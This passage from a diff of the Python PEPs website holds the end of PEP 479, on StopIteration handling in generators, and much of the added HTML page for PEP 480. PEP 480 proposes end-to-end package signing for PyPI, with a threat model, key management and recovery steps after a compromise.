Mark Shannon suggested [10] that the problem could be solved in +next() rather than at the boundary of generator functions. By +having next() catch StopIteration and raise instead +ValueError, all unexpected StopIteration bubbling would be +prevented; however, the backward-incompatibility concerns are far +more serious than for the current proposal, as every next() call +now needs to be rewritten to guard against ValueError instead of +StopIteration - not to mention that there is no way to write one +block of code which reliably works on multiple versions of Python. +(Using a dedicated exception type, perhaps subclassing ValueError, +would help this; however, all code would still need to be rewritten.)

+

Note that calling next(it, default) catches StopIteration and +substitutes the given default value; this feature is often useful to +avoid a try/except block.

+
+
+

Sub-proposal: decorator to explicitly request current behaviour

+

Alyssa Coghlan suggested [11] that the situations where the current +behaviour is desired could be supported by means of a decorator:

+
from itertools import allow_implicit_stop
+
+@allow_implicit_stop
+def my_generator():
+    ...
+    yield next(it)
+    ...
+
+
+

Which would be semantically equivalent to:

+
def my_generator():
+    try:
+        ...
+        yield next(it)
+        ...
+    except StopIteration
+        return
+
+
+

but be faster, as it could be implemented by simply permitting the +StopIteration to bubble up directly.

+

Single-source Python 2/3 code would also benefit in a 3.7+ world, +since libraries like six and python-future could just define their own +version of “allow_implicit_stop” that referred to the new builtin in +3.5+, and was implemented as an identity function in other versions.

+

However, due to the implementation complexities required, the ongoing +compatibility issues created, the subtlety of the decorator’s effect, +and the fact that it would encourage the “quick-fix” solution of just +slapping the decorator onto all generators instead of properly fixing +the code in question, this sub-proposal has been rejected. [12]

+
+
+
+

Criticism

+

Unofficial and apocryphal statistics suggest that this is seldom, if +ever, a problem. [13] Code does exist which relies on the current +behaviour (e.g. [3], [6], [7]), and there is the concern that this +would be unnecessary code churn to achieve little or no gain.

+

Steven D’Aprano started an informal survey on comp.lang.python [14]; +at the time of writing only two responses have been received: one was +in favor of changing list comprehensions to match generator +expressions (!), the other was in favor of this PEP’s main proposal.

+

The existing model has been compared to the perfectly-acceptable +issues inherent to every other case where an exception has special +meaning. For instance, an unexpected KeyError inside a +__getitem__ method will be interpreted as failure, rather than +permitted to bubble up. However, there is a difference. Special +methods use return to indicate normality, and raise to signal +abnormality; generators yield to indicate data, and return to +signal the abnormal state. This makes explicitly raising +StopIteration entirely redundant, and potentially surprising. If +other special methods had dedicated keywords to distinguish between +their return paths, they too could turn unexpected exceptions into +RuntimeError; the fact that they cannot should not preclude +generators from doing so.

+
+

Why not fix all __next__() methods?

+

When implementing a regular __next__() method, the only way to +indicate the end of the iteration is to raise StopIteration. So +catching StopIteration here and converting it to RuntimeError +would defeat the purpose. This is a reminder of the special status of +generator functions: in a generator function, raising +StopIteration is redundant since the iteration can be terminated +by a simple return.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0479.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0480/index.html b/pep-0480/index.html new file mode 100644 index 00000000000..0aa08dd2b46 --- /dev/null +++ b/pep-0480/index.html @@ -0,0 +1,1038 @@ + + + + + + + + PEP 480 – Surviving a Compromise of PyPI: End-to-end signing of packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 480 – Surviving a Compromise of PyPI: End-to-end signing of packages

+
+
Author:
+
Trishank Karthik Kuppusamy <karthik at trishank.com>, +Vladimir Diaz <vladimir.diaz at nyu.edu>, +Justin Cappos <jcappos at nyu.edu>, Marina Moore <mm9693 at nyu.edu>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Requires:
+
458
+
Created:
+
08-Oct-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+

Proposed is an extension to PEP 458 that adds support for end-to-end signing +and the maximum security model. End-to-end signing allows both PyPI and +developers to sign for the distributions that are downloaded by clients. The +minimum security model proposed by PEP 458 supports continuous delivery of +distributions (because they are signed by online keys), but that model does not +protect distributions in the event that PyPI is compromised. In the minimum +security model, attackers who have compromised the signing keys stored on PyPI +Infrastructure may sign for malicious distributions. The maximum security model, +described in this PEP, retains the benefits of PEP 458 (e.g., immediate +availability of distributions that are uploaded to PyPI), but additionally +ensures that end-users are not at risk of installing forged software if PyPI is +compromised.

+

This PEP requires some changes to the PyPI infrastructure, and some suggested +changes for developers who wish to participate in end-to-end signing. These +changes include updating the metadata layout from PEP 458 to include delegations +to developer keys, adding a process to register developer keys with PyPI, and a +change in the upload workflow for developers who take advantage of end-to-end +signing. All of these changes are described in detail later in this PEP. Package +managers that wish to take advantage of end-to-end signing do not need to do any +additional work beyond what is required to consume metadata described in PEP +458.

+

This PEP discusses the changes made to PEP 458 but excludes its informational +elements to primarily focus on the maximum security model. For example, an +overview of The Update Framework or the basic mechanisms in PEP 458 are not +covered here. The changes to PEP 458 include modifications to the snapshot +process, key compromise analysis, auditing snapshots, and the steps that should +be taken in the event of a PyPI compromise. The signing and key management +process that PyPI MAY RECOMMEND is discussed but not strictly defined. How the +release process should be implemented to manage keys and metadata is left to +the implementors of the signing tools. That is, this PEP delineates the +expected cryptographic key type and signature format included in metadata that +MUST be uploaded by developers in order to support end-to-end verification of +distributions.

+
+
+

PEP Status

+

The community discussed this PEP from 2014 to 2018. Due to the amount +of work required to implement this PEP, discussion was deferred until +after approval for the precursor step in PEP 458. As of mid-2020 PEP +458 is approved and implementation is in progress, and the PEP authors +aim to gain approval so they can secure appropriate funding for +implementation.

+
+
+

Rationale

+

PEP 458 proposes how PyPI should be integrated with The Update Framework +(TUF) [2]. It explains how modern package managers like pip can be made more +secure, and the types of attacks that can be prevented if PyPI is modified on +the server side to include TUF metadata. Package managers can reference the +TUF metadata available on PyPI to download distributions more securely.

+

PEP 458 also describes the metadata layout of the PyPI repository and employs +the minimum security model, which supports continuous delivery of projects and +uses online cryptographic keys to sign the distributions uploaded by +developers. Although the minimum security model guards against most attacks on +software updaters [5] [6], such as mix-and-match and extraneous dependencies +attacks, it can be improved to support end-to-end signing and to prohibit +forged distributions in the event that PyPI is compromised.

+

PEP 480 builds on PEP 458 by adding support for developer signing, and +reducing the reliance on online keys to prevent malicious distributions. +The main strength of PEP 458 and the minimum security model is the automated +and simplified release process: developers may upload distributions and then +have PyPI sign for their distributions. Much of the release process is handled +in an automated fashion by online roles and this approach requires storing +cryptographic signing keys on the PyPI infrastructure. Unfortunately, +cryptographic keys that are stored online are vulnerable to theft. The maximum +security model, proposed in this PEP, permits developers to sign for the +distributions that they make available to PyPI users, and does not put +end-users at risk of downloading malicious distributions if the online keys +stored on PyPI infrastructure are compromised.

+
+
+

Threat Model

+

The threat model assumes the following:

+
    +
  • Offline keys are safe and securely stored.
  • +
  • Attackers can compromise at least one of PyPI’s trusted keys that are stored +online, and may do so at once or over a period of time.
  • +
  • Attackers can respond to client requests.
  • +
  • Attackers may control any number of developer keys for projects a client does +not want to install.
  • +
+

Attackers are considered successful if they can cause a client to install (or +leave installed) something other than the most up-to-date version of the +software the client is updating. When an attacker is preventing the +installation of updates, the attacker’s goal is that clients not realize that +anything is wrong.

+
+
+

Definitions

+

The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, +“SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be +interpreted as described in RFC 2119.

+

This PEP focuses on integrating TUF with PyPI; however, the reader is +encouraged to read about TUF’s design principles [2]. It is also RECOMMENDED +that the reader be familiar with the TUF specification [3], and PEP 458 +(which this PEP is extending).

+

The following terms used in this PEP are defined in the Python Packaging +Glossary [4]: project, release, distribution.

+

Terms used in this PEP are defined as follows:

+
    +
  • Distribution file: A versioned archive file that contains Python packages, +modules, and other resource files that are used to distribute a release. The +terms distribution file, distribution package [4], or simply +distribution or package may be used interchangeably in this PEP.
  • +
  • Simple index: The HTML page that contains internal links to distribution +files.
  • +
  • Target files: As a rule of thumb, target files are all files on PyPI whose +integrity should be guaranteed with TUF. Typically, this includes +distribution files, and PyPI metadata such as simple indices.
  • +
  • Roles: Roles in TUF encompass the set of actions a party is authorized to +perform, including what metadata they may sign and which packages they are +responsible for. There is one root role in PyPI. There are multiple roles +whose responsibilities are delegated to them directly or indirectly by the +root role. The term “top-level role” refers to the root role and any role +delegated by the root role. Each role has a single metadata file that it is +trusted to provide.
  • +
  • Metadata: Metadata are files that describe roles, other metadata, and target +files.
  • +
  • Repository: A repository is a resource comprised of named metadata and target +files. Clients request metadata and target files stored on a repository.
  • +
  • Consistent snapshot: A set of TUF metadata and target files that capture the +complete state of all projects on PyPI as they existed at some fixed point in +time.
  • +
  • Developer: Either the owner or maintainer of a project who is allowed to +update TUF metadata, as well as distribution metadata and files for a given +project.
  • +
  • Online key: A private cryptographic key that MUST be stored on the PyPI +server infrastructure. This usually allows automated signing with the key. +An attacker who compromises the PyPI infrastructure will be able to +immediately read these keys.
  • +
  • Offline key: A private cryptographic key that MUST be stored independent of +the PyPI server infrastructure. This prevents automated signing with the +key. An attacker who compromises the PyPI infrastructure will not be able to +immediately read these keys.
  • +
  • Threshold signature scheme: A role can increase its resilience to key +compromises by specifying that at least t out of n keys are REQUIRED to sign +its metadata. A compromise of t-1 keys is insufficient to compromise the +role itself. Saying that a role requires (t, n) keys denotes the threshold +signature property.
  • +
+
+
+

Maximum Security Model

+

The maximum security model permits developers to sign their projects and to +upload signed metadata to PyPI. In the model proposed in this PEP, if the PyPI +infrastructure were compromised, +attackers would be unable to serve malicious versions of a claimed project +without having access to that project’s developer key. Figure 1 depicts the +changes made to the metadata layout of the minimum security model, namely that +developer roles are now supported and that three new delegated roles exist: +claimed, recently-claimed, and unclaimed. The bins role from the +minimum security model has been renamed unclaimed and can contain any +projects that have not been added to claimed. The unclaimed role functions +just as before (i.e., as explained in PEP 458, projects added to this role are +signed by PyPI with an online key). Offline keys provided by developers ensure +the strength of the maximum security model over the minimum model. Although +the minimum security model supports continuous delivery of projects, all +projects are signed by an online key. That is, an attacker is able to corrupt +packages in the minimum security model, but not in the maximum model, without +also compromising a developer’s key.

+../_images/pep-0480-1.png +

Figure 1: An overview of the metadata layout in the maximum security model. +The maximum security model supports continuous delivery and survivable key +compromise.

+

Projects that are signed by developers and uploaded to PyPI for the first time +are added to the recently-claimed role. The recently-claimed role uses an +online key, so projects uploaded for the first time are immediately available +to clients. After some time has passed, PyPI administrators MAY periodically +move (e.g., every month) projects listed in recently-claimed to the claimed +role for maximum security. The claimed role uses an offline key, thus +projects added to this role cannot be easily forged if PyPI is compromised.

+

The recently-claimed role is separate from the unclaimed role for usability +and efficiency, not security. If new project delegations were prepended to +unclaimed metadata, unclaimed would need to be re-downloaded every time a +project obtained a key. By separating out new projects, the amount of data +retrieved is reduced. From a usability standpoint, it also makes it easier for +administrators to see which projects are now claimed. This information is +needed when moving keys from recently-claimed to claimed, which is +discussed in more detail in the “Producing Consistent Snapshots” section.

+
+
+

End-to-End Signing

+

End-to-end signing allows both PyPI and developers to sign for the metadata +downloaded by clients. PyPI is trusted to make uploaded projects available to +clients (PyPI signs the metadata for this part of the process), and developers +sign the distributions that they upload to PyPI.

+

In order to delegate trust to a project, developers are required to submit at +least one public key to PyPI. Developers may submit multiple public keys for +the same project (for example, one key for each maintainer of the project). +PyPI takes all of the project’s public keys and adds them to parent +metadata that PyPI then signs. After the initial trust is established, +developers are required to sign distributions that they upload to PyPI using +at least one public key’s corresponding private key. The signed TUF metadata that +developers upload to PyPI includes information like the distribution’s file +size and hash, which package managers use to verify distributions that are +downloaded.

+

The practical implications of end-to-end signing is the extra administrative +work needed to delegate trust to a project, and the signed metadata that +developers MUST upload to PyPI along with the distribution. Specifically, PyPI +is expected to periodically sign metadata with an offline key by adding +projects to the claimed metadata file and signing it. In contrast, projects +are only ever signed with an online key in the minimum security model. +End-to-end signing does require manual intervention to delegate trust (i.e., to +sign metadata with an offline key), but this is a one-time cost and projects +have stronger protections against PyPI compromises thereafter.

+
+
+

Metadata Signatures, Key Management, and Signing Distributions

+

This section discusses the tools, signature scheme, and signing methods that +PyPI MAY recommend to implementors of the signing tools. Developers are +expected to use these tools to sign and upload distributions to PyPI. To +summarize the RECOMMENDED tools and schemes discussed in the subsections below, +developers MAY generate cryptographic keys and sign metadata (with the Ed25519 +signature scheme) in some automated fashion, where the metadata includes the +information required to verify the authenticity of the distribution. +Developers then upload metadata to PyPI, where it will be available for +download by package managers such as pip (i.e., package managers that support +TUF metadata). The entire process is transparent to the end-users (using a +package manager that supports TUF) that download distributions from PyPI.

+

The first three subsections (Cryptographic Signature Scheme, Cryptographic Key +Files, and Key Management) cover the cryptographic components of the developer +release process. That is, which key type PyPI supports, how keys may be +stored, and how keys may be generated. The two subsections that follow the +first three discuss the PyPI modules that SHOULD be modified to support TUF +metadata. For example, Twine and Distutils are two projects that SHOULD be +modified. Finally, the last subsection goes over the automated key management +and signing solution that is RECOMMENDED for the signing tools.

+

TUF’s design is flexible with respect to cryptographic key types, signatures, +and signing methods. The tools, modification, and methods discussed in the +following sections are RECOMMENDATIONS for the implementors of the signing +tools.

+
+

Cryptographic Signature Scheme: Ed25519

+

The package manager (pip) shipped with CPython MUST work on non-CPython +interpreters and cannot have dependencies that have to be compiled (i.e., the +PyPI+TUF integration MUST NOT require compilation of C extensions in order to +verify cryptographic signatures). Verification of signatures MUST be done in +Python, and verifying RSA [8] signatures in pure-Python may be impractical due +to speed. Therefore, PyPI MAY use the Ed25519 signature scheme.

+

Ed25519 [9] is a public-key signature system that uses small cryptographic +signatures and keys. A pure-Python implementation of the Ed25519 signature +scheme is available. Verification of Ed25519 signatures is fast even when +performed in Python.

+
+
+

Cryptographic Key Files

+

The implementation MAY encrypt key files with AES-256-CTR-Mode and strengthen +passwords with PBKDF2-HMAC-SHA256 (100K iterations by default, but this may be +overridden by the developer). The current Python implementation of TUF can use +any cryptographic library (support for PyCA cryptography will be added in the +future), may override the default number of PBKDF2 iterations, and the KDF +tweaked to taste.

+
+
+

Key Management: miniLock

+

An easy-to-use key management solution is needed. One solution is to derive a +private key from a password so that developers do not have to manage +cryptographic key files across multiple computers. miniLock is an example +of how this can be done. Developers may view the cryptographic key as a +secondary password. miniLock also works well with a signature scheme like +Ed25519, which only needs a very small key.

+
+
+

Third-party Upload Tools: Twine

+

Third-party tools like Twine MAY be modified (if they wish to support +distributions that include TUF metadata) to sign and upload developer projects +to PyPI. Twine is a utility for interacting with PyPI that uses TLS to upload +distributions, and prevents MITM attacks on usernames and passwords.

+
+
+

Build backends

+

Build backends MAY be modified to sign metadata and to upload signed +distributions to PyPI.

+
+
+

Automated Signing Solution

+

An easy-to-use key management solution is RECOMMENDED for developers. One +approach is to generate a cryptographic private key from a user password, akin +to miniLock. Although developer signatures can remain optional, this approach +may be inadequate due to the great number of potentially unsigned dependencies +each distribution may have. If any one of these dependencies is unsigned, it +negates any benefit the project gains from signing its own distribution (i.e., +attackers would only need to compromise one of the unsigned dependencies to +attack end-users). Requiring developers to manually sign distributions and +manage keys is expected to render key signing an unused feature.

+

A default, PyPI-mediated key management and package signing solution that is +transparent to developers and does not require a key escrow (sharing of +encrypted private keys with PyPI) is RECOMMENDED for the signing tools. +Additionally, the signing tools SHOULD circumvent the sharing of private keys +across multiple machines of each developer. This means that the key management +solution SHOULD support multiple keys for each project.

+

The following outlines an automated signing solution that a new developer MAY +follow to upload a distribution to PyPI:

+
    +
  1. Register a PyPI project.
  2. +
  3. Enter a secondary password (independent of the PyPI user account password).
  4. +
  5. Optional: Add a new identity to the developer’s PyPI user account from a +second machine (after a password prompt).
  6. +
  7. Upload project.
  8. +
  9. Optional: Other maintainers associated with the project may log in and +enter a secondary password to add their identity to the project.
  10. +
+

Step 1 is the normal procedure followed by developers to register a PyPI +project.

+

Step 2 generates an encrypted key file (private), uploads an Ed25519 public key +to PyPI, and signs the TUF metadata that is generated for the distribution.

+

Optionally adding a new identity from a second machine, by simply entering a +password, in step 3 also generates an encrypted private key file and uploads an +Ed25519 public key to PyPI. Separate identities MAY be created to allow a +developer, to sign releases on multiple machines. +An existing verified identity (its public key is contained in project metadata +or has been uploaded to PyPI) signs for new identities. By default, project +metadata has a signature threshold of “1” and other verified identities may +create new releases to satisfy the threshold.

+

Step 4 uploads the distribution file and TUF metadata to PyPI. The “Snapshot +Process” section discusses in detail the procedure followed by developers to +upload a distribution to PyPI.

+

Step 5 allows other maintainers to generate an encrypted key file, in a similar +manner to step 2. These keys SHOULD be uploaded to PyPI and added to the TUF +metadata. This key MAY be used to upload future releases of the project.

+

Generation of cryptographic files and signatures is transparent to the +developers in the default case: developers need not be aware that packages are +automatically signed. However, the signing tools should be flexible; developers +may want to generate their own keys and handle the key management themselves. +In this case, the developers may simply upload their public key(s) to PyPI.

+

The repository and developer TUF tools currently support all of the +recommendations previously mentioned, except for the automated signing +solution, which SHOULD be added to Distlib, Twine, and other third-party +signing tools. The automated signing solution calls available repository tool +functions to sign metadata and to generate the cryptographic key files.

+
+
+

Snapshot Process

+

The snapshot process is fairly simple and SHOULD be automated. The snapshot +process MUST keep in memory the latest working set of root, targets, and +delegated roles. Every minute or so the snapshot process will sign for this +latest working set. (Recall that project uploads continuously +inform the snapshot process about the latest delegated metadata in a +concurrency-safe manner. The snapshot process will actually sign for a copy of +the latest working set while the latest working set in memory will be updated +with information that is continuously communicated by the project transaction +processes.) The snapshot process MUST generate and sign new timestamp +metadata that will vouch for the metadata (root, targets, and delegated +roles) generated in the previous step. Finally, the snapshot process MUST make +available to clients the new timestamp and snapshot metadata representing +the latest snapshot.

+

A claimed or recently-claimed project will need to upload in its +transaction to PyPI not just targets (a simple index as well as distributions) +but also TUF metadata. The project MAY do so by uploading a ZIP file containing +two directories, /metadata/ (containing delegated targets metadata files) and +/targets/ (containing targets such as the project simple index and +distributions that are signed by the delegated targets metadata).

+

Whenever the project uploads metadata or target files to PyPI, PyPI SHOULD check the +project TUF metadata for at least the following properties:

+
    +
  • A threshold number of the developers keys registered with PyPI by that +project MUST have signed for the delegated targets metadata file that +represents the “root” of targets for that project (e.g. metadata/targets/ +project.txt).
  • +
  • The signatures of delegated targets metadata files MUST be valid.
  • +
  • The delegated targets metadata files MUST NOT have expired.
  • +
  • The delegated targets metadata MUST be consistent with the targets.
  • +
  • A delegator MUST NOT delegate targets that were not delegated to itself by +another delegator.
  • +
  • A delegatee MUST NOT sign for targets that were not delegated to itself by a +delegator.
  • +
+

If PyPI chooses to check the project TUF metadata, then PyPI MAY choose to +reject publishing any set of metadata or target files that do not meet these +requirements.

+

PyPI MUST enforce access control by ensuring that each project can only write +to the TUF metadata for which it is responsible. It MUST do so by ensuring that +project upload processes write to the correct metadata as well as correct +locations within those metadata. For example, a project upload process for +an unclaimed project MUST write to the correct target paths in the correct +delegated unclaimed metadata for the targets of the project.

+

On rare occasions, PyPI MAY wish to extend the TUF metadata format for projects +in a backward-incompatible manner. Note that PyPI will NOT be able to +automatically rewrite existing TUF metadata on behalf of projects in order to +upgrade the metadata to the new backward-incompatible format because this would +invalidate the signatures of the metadata as signed by developer keys. +Instead, package managers SHOULD be written to recognize and handle multiple +incompatible versions of TUF metadata so that claimed and recently-claimed +projects could be offered a reasonable time to migrate their metadata to newer +but backward-incompatible formats. One mechanism for handling this version +change is described in TAP 14.

+

If PyPI eventually runs out of disk space to produce a new consistent snapshot, +then PyPI MAY then use something like a “mark-and-sweep” algorithm to delete +sufficiently outdated consistent snapshots. That is, only outdated metadata +like timestamp and snapshot that are no longer used are deleted. +Specifically, in order to preserve the latest consistent snapshot, PyPI would +walk objects – beginning from the root (timestamp) – of the latest +consistent snapshot, mark all visited objects, and delete all unmarked objects. +The last few consistent snapshots may be preserved in a similar fashion. +Deleting a consistent snapshot will cause clients to see nothing except HTTP +404 responses to any request for a target of the deleted consistent snapshot. +Clients SHOULD then retry (as before) their requests with the latest consistent +snapshot.

+

All package managers that support TUF metadata MUST be modified to download +every metadata and target file (except for timestamp metadata) by including, +in the request for the file, the cryptographic hash of the file in the +filename. Following the filename convention RECOMMENDED in the next +subsection, a request for the file at filename.ext will be transformed to the +equivalent request for the file at digest.filename.

+

Finally, PyPI SHOULD use a transaction log to record project transaction +processes and queues so that it will be easier to recover from errors after a +server failure.

+
+
+

Producing Consistent Snapshots

+

PyPI is responsible for updating, depending on the project, either the +claimed, recently-claimed, or unclaimed metadata and associated delegated +metadata. Every project MUST upload its set of metadata and targets in a single +transaction. The uploaded set of files is called the “project transaction.” +How PyPI MAY validate files in a project transaction is discussed in a later +section. The focus of this section is on how PyPI will respond to a project +transaction.

+

Every metadata and target file MUST include in its filename the hex digest +of its BLAKE2b-256 hash, which PyPI may prepend to filenames after the files +have been uploaded. For this PEP, it is RECOMMENDED that PyPI adopt a simple +convention of the form: digest.filename, where filename is the original +filename without a copy of the hash, and digest is the hex digest of the hash.

+

When an unclaimed project uploads a new transaction, a project transaction +process MUST add all new target files and relevant delegated unclaimed metadata. +The project upload process MUST inform the snapshot process about new +delegated unclaimed metadata.

+

When a recently-claimed project uploads a new transaction, a project +upload process MUST add all new target files and delegated targets metadata for +the project. If the project is new, then the project upload process MUST +also add new recently-claimed metadata with the public keys (which MUST be +part of the transaction) for the project. recently-claimed projects have a +threshold value of “1” set by the upload process. Finally, the project +upload process MUST inform the snapshot process about new +recently-claimed metadata, as well as the current set of delegated targets +metadata for the project.

+

The upload process for a claimed project is slightly different in that +PyPI administrators periodically move (a manual process that MAY occur every +two weeks to a month) projects from the recently-claimed role to the +claimed role. (Moving a project from recently-claimed to claimed is a +manual process because PyPI administrators have to use an offline key to sign +the claimed project’s distribution.) A project upload process MUST then +add new recently-claimed and claimed metadata to reflect this migration. As +is the case for a recently-claimed project, the project upload process +MUST always add all new target files and delegated targets metadata for the claimed +project. Finally, the project upload process MUST inform the consistent +snapshot process about new recently-claimed or claimed metadata, as well as +the current set of delegated targets metadata for the project.

+

Project upload processes SHOULD be automated, except when PyPI +administrators move a project from the recently-claimed role to the claimed +role. Project upload processes MUST also be applied atomically: either all +metadata and target files – or none of them – are added. The project transaction +processes and snapshot process SHOULD work concurrently. Finally, project +upload processes SHOULD keep in memory the latest claimed, +recently-claimed, and unclaimed metadata so that they will be correctly +updated in new consistent snapshots.

+

The queue MAY be processed concurrently in order of appearance, provided that +the following rules are observed:

+
    +
  1. No pair of project upload processes may concurrently work on the same +project.
  2. +
  3. No pair of project upload processes may concurrently work on +unclaimed projects that belong to the same delegated unclaimed role.
  4. +
  5. No pair of project upload processes may concurrently work on new +recently-claimed projects.
  6. +
  7. No pair of project upload processes may concurrently work on new +claimed projects.
  8. +
  9. No project upload process may work on a new claimed project while +another project upload process is working on a new recently-claimed +project and vice versa.
  10. +
+

These rules MUST be observed to ensure that metadata is not read from or +written to inconsistently.

+
+
+

Auditing Snapshots

+

If a malicious party compromises PyPI, they can sign arbitrary files with any +of the online keys. The roles with offline keys (i.e., root and targets) +are still protected. To safely recover from a repository compromise, snapshots +should be audited to ensure that files are only restored to trusted versions.

+

When a repository compromise has been detected, the integrity of three types of +information must be validated:

+
    +
  1. If the online keys of the repository have been compromised, they can be +revoked by having the targets role sign new metadata, delegated to a new +key.
  2. +
  3. If the role metadata on the repository has been changed, this will impact +the metadata that is signed by online keys. Any role information created +since the compromise should be discarded. As a result, developers of new +projects will need to re-register their projects.
  4. +
  5. If the packages themselves may have been tampered with, they can be +validated using the stored hash information for packages that existed in +trusted metadata before the compromise. Also, new distributions that are +signed by developers in the claimed role may be safely retained. However, +any distributions signed by developers in the recently-claimed or +unclaimed roles should be discarded.
  6. +
+

In order to safely restore snapshots in the event of a compromise, PyPI SHOULD +maintain a small number of its own mirrors to copy PyPI snapshots according to +some schedule. The mirroring protocol can be used immediately for this +purpose. The mirrors must be secured and isolated such that they are +responsible only for mirroring PyPI. The mirrors can be checked against one +another to detect accidental or malicious failures.

+

Another approach is to periodically generate the cryptographic hash of +each snapshot and tweet it. For example, upon receiving the tweet, a +user comes forward with the actual metadata and the repository +maintainers are then able to verify the metadata’s cryptographic hash. +Alternatively, PyPI may periodically archive its own versions of +snapshots rather than rely on externally provided metadata. In this +case, PyPI SHOULD take the cryptographic hash of every package on the +repository and store this data on an offline device. If any package +hash has changed, this indicates an attack has occurred.

+

Attacks that serve different versions of metadata or that freeze a version of a +package at a specific version can be handled by TUF with techniques such as +implicit key revocation and metadata mismatch detection [2].

+
+
+
+

Key Compromise Analysis

+

This PEP has covered the maximum security model, the TUF roles that should be +added to support continuous delivery of distributions, how to generate and sign +the metadata of each role, and how to support distributions that have been +signed by developers. The remaining sections discuss how PyPI SHOULD audit +repository metadata, and the methods PyPI can use to detect and recover from a +PyPI compromise.

+

Table 1 summarizes a few of the attacks possible when a threshold number of +private cryptographic keys (belonging to any of the PyPI roles) are +compromised. The leftmost column lists the roles (or a combination of roles) +that have been compromised, and the columns to the right show whether the +compromised roles leaves clients susceptible to malicious updates, freeze +attacks, or metadata inconsistency attacks.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Role CompromiseMalicious UpdatesFreeze AttackMetadata Inconsistency +Attacks
timestampNO +snapshot and +targets or any +of the delegated +roles need to +cooperateYES +limited by earliest +root, targets, or bin +metadata expiry timeNO +snapshot needs to +cooperate
snapshotNO +timestamp and +targets or any of +the delegated +roles need to +cooperateNO +timestamp needs to +cooperateNO +timestamp needs to +cooperate
timestamp +AND +snapshotNO +targets or any +of the delegated +roles need to +cooperateYES +limited by earliest +root, targets, or bin +metadata expiry timeYES +limited by earliest +root, targets, or bin +metadata expiry time
targets +OR +claimed +OR +recently-claimed +OR +unclaimed +OR +projectNO +timestamp and +snapshot need to +cooperateNOT APPLICABLE +need timestamp and +snapshotNOT APPLICABLE +need timestamp +and snapshot
(timestamp +AND +snapshot) +AND +projectYESYES +limited by earliest +root, targets, or bin +metadata expiry timeYES +limited by earliest +root, targets, or bin +metadata expiry time
(timestamp +AND +snapshot) +AND +(recently-claimed +OR +unclaimed)YES +but only of +projects not +delegated by +claimedYES +limited by earliest +root, targets, +claimed, +recently-claimed, +project, or unclaimed +metadata expiry timeYES +limited by earliest +root, targets, +claimed, +recently-claimed, +project, or unclaimed +metadata expiry time
(timestamp +AND +snapshot) +AND +(targets OR +claimed)YESYES +limited by earliest +root, targets, +claimed, +recently-claimed, +project, or unclaimed +metadata expiry timeYES +limited by earliest +root, targets, +claimed, +recently-claimed, +project, or unclaimed +metadata expiry time
rootYESYESYES
+

Table 1: Attacks that are possible by compromising certain combinations of role +keys. In September 2013, it was shown how the latest version (at the time) +of pip was susceptible to these attacks and how TUF could protect users against +them [7]. Roles signed by offline keys are in bold.

+

Note that compromising targets or any delegated role (except for project +targets metadata) does not immediately allow an attacker to serve malicious +updates. The attacker must also compromise the timestamp and snapshot +roles (which are both online and therefore more likely to be compromised). +This means that in order to launch any attack, one must not only be able to act +as a man-in-the-middle, but also compromise the timestamp key (or compromise +the root keys and sign a new timestamp key). To launch any attack other +than a freeze attack, one must also compromise the snapshot key. Finally, a +compromise of the PyPI infrastructure MAY introduce malicious updates to +recently-claimed projects because the keys for these roles are online.

+
+

In the Event of a Key Compromise

+

A key compromise means that a threshold of keys belonging to developers or the +roles on PyPI, as well as the PyPI infrastructure, have been compromised and +used to sign new metadata on PyPI.

+

If a threshold number of developer keys of a project have been compromised, +the project MUST take the following steps:

+
    +
  1. The project metadata and targets MUST be restored to the last known good +consistent snapshot where the project was not known to be compromised. This +can be done by developers repackaging and resigning all targets with +the new keys.
  2. +
  3. The project’s metadata MUST have its version numbers incremented, expiry +times suitably extended, and signatures renewed.
  4. +
+

Whereas PyPI MUST take the following steps:

+
    +
  1. Revoke the compromised developer keys from the recently-claimed or +claimed role. This is done by replacing the compromised developer keys +with newly issued developer keys.
  2. +
  3. A new timestamped consistent snapshot MUST be issued.
  4. +
+

If a threshold number of timestamp, snapshot, recently-claimed, or +unclaimed keys have been compromised, then PyPI MUST take the following +steps:

+
    +
  1. Revoke the timestamp, snapshot, and targets role keys from the +root role. This is done by replacing the compromised timestamp, +snapshot, and targets keys with newly issued keys.
  2. +
  3. Revoke the recently-claimed and unclaimed keys from the targets role +by replacing their keys with newly issued keys. Sign the new targets role +metadata and discard the new keys (because, as we explained earlier, this +increases the security of targets metadata).
  4. +
  5. Clear all targets or delegations in the recently-claimed role and delete +all associated delegated targets metadata. Recently registered projects +SHOULD register their developer keys again with PyPI.
  6. +
  7. All targets of the recently-claimed and unclaimed roles SHOULD be +compared with the last known good consistent snapshot where none of the +timestamp, snapshot, recently-claimed, or unclaimed keys were known to have +been compromised. Added, updated, or deleted targets in the compromised +consistent snapshot that do not match the last known good consistent +snapshot SHOULD be restored to their previous versions. After ensuring the +integrity of all unclaimed targets, the unclaimed metadata MUST be +regenerated.
  8. +
  9. The recently-claimed and unclaimed metadata MUST have their version +numbers incremented, expiry times suitably extended, and signatures +renewed.
  10. +
  11. A new timestamped consistent snapshot MUST be issued.
  12. +
+

This would preemptively protect all of these roles even though only one of them +may have been compromised.

+

If a threshold number of the targets or claimed keys have been compromised, +then there is little that an attacker would be able do without the timestamp +and snapshot keys. In this case, PyPI MUST simply revoke the compromised +targets or claimed keys by replacing them with new keys in the root and +targets roles, respectively.

+

If a threshold number of the timestamp, snapshot, and claimed keys have +been compromised, then PyPI MUST take the following steps in addition to the +steps taken when either the timestamp or snapshot keys are compromised:

+
    +
  1. Revoke the claimed role keys from the targets role and replace them with +newly issued keys.
  2. +
